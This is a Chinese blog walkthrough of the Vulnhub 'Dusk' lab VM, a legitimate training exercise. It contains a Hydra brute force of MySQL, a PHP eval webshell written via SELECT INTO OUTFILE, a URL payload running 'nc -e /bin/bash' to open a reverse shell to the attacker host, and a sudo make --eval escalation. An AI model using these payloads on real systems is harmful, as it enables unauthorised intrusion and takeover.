首页 > 其他分享 >Vulnhub之Dusk靶机测试过程

Vulnhub之Dusk靶机测试过程

时间:2023-01-12 22:57:30浏览次数:53  
标签:http Dusk kali 192.168 Vulnhub 靶机 56.208 usr

Dusk

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:02:3b:33      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.208  08:00:27:b6:83:b3      1      60  PCS Systemtechnik GmbH      

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.208

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 08:51 EST
Nmap scan report for 192.168.56.208
Host is up (0.00026s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     pyftpdlib 1.5.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.208:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 b5ff692a03fd6d04ed2a06aabfb26a7c (RSA)
|   256 0b6f20d67c6c84bed8406169a2c6e88a (ECDSA)
|_  256 85ff47d99250cbf7446cb4f45ce91ced (ED25519)
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: dusk.dusk, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
| ssl-cert: Subject: commonName=dusk.dusk
| Subject Alternative Name: DNS:dusk.dusk
| Not valid before: 2019-11-27T21:09:14
|_Not valid after:  2029-11-24T21:09:14
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
|   Thread ID: 37
|   Capabilities flags: 63486
|   Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, FoundRows, Support41Auth, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: \F'/U@~}xbcL/EP?.d1e
|_  Auth Plugin Name: mysql_native_password
8080/tcp open  http    PHP cli server 5.5 or later (PHP 7.3.11-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:B6:83:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host:  dusk.dusk; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds

获得Shell

3306端口

看有无弱口令

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)

21端口

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.208:kali): anonymous
331 Username ok, send password.
Password: 
530 Anonymous access not allowed.
ftp: Login failed
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ searchsploit pyftpdlib 1.5.5                               
Exploits: No Results
Shellcodes: No Results

  1. 不允许匿名访问

  2. FTP服务器软件版本没有可利用漏洞

80端口

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.208
+ Target Hostname:    192.168.56.208
+ Target Port:        80
+ Start Time:         2023-01-12 08:56:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 598295a712980, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-01-12 08:56:48 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/12 08:58:00 Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 219400 / 220561 (99.47%)===============================================================
2023/01/12 08:58:26 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/12 08:59:49 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1321074 / 1323366 (99.83%)===============================================================
2023/01/12 09:02:36 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ dirb http://192.168.56.208

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 12 09:03:27 2023
URL_BASE: http://192.168.56.208/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.208/ ----
+ http://192.168.56.208/index.html (CODE:200|SIZE:10701)                                                                    
==> DIRECTORY: http://192.168.56.208/javascript/                                                                            
+ http://192.168.56.208/server-status (CODE:403|SIZE:279)                                                                   
                                                                                                                            
---- Entering directory: http://192.168.56.208/javascript/ ----
==> DIRECTORY: http://192.168.56.208/javascript/jquery/                                                                     
                                                                                                                            
---- Entering directory: http://192.168.56.208/javascript/jquery/ ----
+ http://192.168.56.208/javascript/jquery/jquery (CODE:200|SIZE:271809)                                                     
                                                                                                                            
-----------------
END_TIME: Thu Jan 12 09:03:31 2023
DOWNLOADED: 13836 - FOUND: 3

没有扫描出有价值的信息。

8080端口

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.208
+ Target Hostname:    192.168.56.208
+ Target Port:        8080
+ Start Time:         2023-01-12 09:04:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.11-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF:  Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-01-12 09:04:15 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/01/12 09:06:32 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.208:8080/9017c201-9961-4795-ad75-f9c8e97668ec => 200 (Length: 257). To continue please exclude the status code or the length
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclue-length 257
Error: unknown flag: --exclue-length
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclude-length 257
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          257
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/01/12 09:06:48 Starting gobuster in directory enumeration mode
===============================================================
/21540                (Status: 200) [Size: 340]
/head_02              (Status: 200) [Size: 340]
/PublicEducation      (Status: 200) [Size: 340]
/play-poker           (Status: 200) [Size: 340]
Progress: 1322766 / 1323366 (99.95%)===============================================================
2023/01/12 09:19:12 Finished
===============================================================

看了其他人的做法,是去破解mysql的密码(有点反常哈哈)

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-12 09:20:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.208:3306/
[3306][mysql] host: 192.168.56.208   login: root   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-12 09:20:28

这说明Mysql还是有弱口令,在前面弱口令尝试的时候,只试了空密码,root,应该再试一下password.

由于从访问8080网页知道,当前目录位于/var/tmp目录

http://192.168.56.208:8080/

因此可以写入一句话:

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 55
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/1.php";
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> 

访问1.php文件,并带入参数cmd,并建立反弹的shell

http://192.168.56.208:8080/1.php?cmd=system(%27nc%20-e%20/bin/bash%20192.168.56.206%205555%27);
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.208] 46350
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dusk:/var/tmp$ 

提权

www-data@dusk:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on dusk:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
www-data@dusk:/home$ 

www-data@dusk:/home$ COMMAND='/bin/sh'
COMMAND='/bin/sh'
www-data@dusk:/home$ sudo -u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
<u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
$ id
id
uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner),123(docker)
$ 

成功的切换到了dusk

然后利用docker进行root提权

标签:http,Dusk,kali,192.168,Vulnhub,靶机,56.208,usr
From: https://www.cnblogs.com/jason-huawen/p/17048186.html

相关文章

  • Vulnhub之Drippingblues靶机详细测试过程(实现提权)
    Drippingblues作者:jason_huawen靶机信息名称:DrippingBlues:1地址:https://www.vulnhub.com/entry/dripping-blues-1,744/识别目标主机IP地址──(kali㉿kali)-[~/......
  • 靶机练习 - 温故知新 - Toppo(sudo 提权)
    重新做了一下以前做过的第一个靶机(https://www.cnblogs.com/sallyzhang/p/12792042.html),这个靶机主要是练习sudo提权,当时不会也没理解。开启靶机,直接告诉了IP地址:端口......
  • Matrix-Breakout: 2 Morpheus-vulnhub靶场
    环境信息靶机:192.168.124.153攻击机:192.168.124.129打靶过程nmap扫描端口及服务发现开放22,80,81端口访问80端口网站有一个黑客帝国里的角色Trinity,让我们调......
  • Vulnhub之Eric靶机详细测试过程
    Eric作者:jason_huawen靶机信息名称:SP:eric地址:https://www.vulnhub.com/entry/sp-eric,274/识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Eric]└─$......
  • vulnhub靶场之HACKATHONCTF: 2
    准备:攻击机:虚拟机kali、本机win10。靶机:HackathonCTF:2,下载地址:https://download.vulnhub.com/hackathonctf/Hackathon2.zip,下载后直接vm打开即可。知识点:vim提权、hyd......
  • vulnhub靶场之FUNBOX: UNDER CONSTRUCTION!
    准备:攻击机:虚拟机kali、本机win10。靶机:Funbox:UnderConstruction!,下载地址:https://download.vulnhub.com/funbox/Funbox10.ova,下载后直接vbox打开即可。知识点:osComm......
  • vulnhub靶场之BUFFEMR: 1.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:BUFFEMR:1.0.1,下载地址:https://download.vulnhub.com/buffemr/BuffEMR-v1.0.1.ova,下载后直接vbox打开即可。知识点:openemr框架......
  • Vulnhub之Funbox 3靶机详细测试过程
    Funbox3作者:jason_huawen靶机信息名称:Funbox:Easy地址:https://www.vulnhub.com/entry/funbox-easy,526/识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/F......
  • Vulnhub之Funbox 4靶机详细测试过程(由于缺包,提权失败)
    Funbox4识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|......
  • Vulnhub之Funbox Gamble靶机测试过程(部分)
    Funbox6识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|Sc......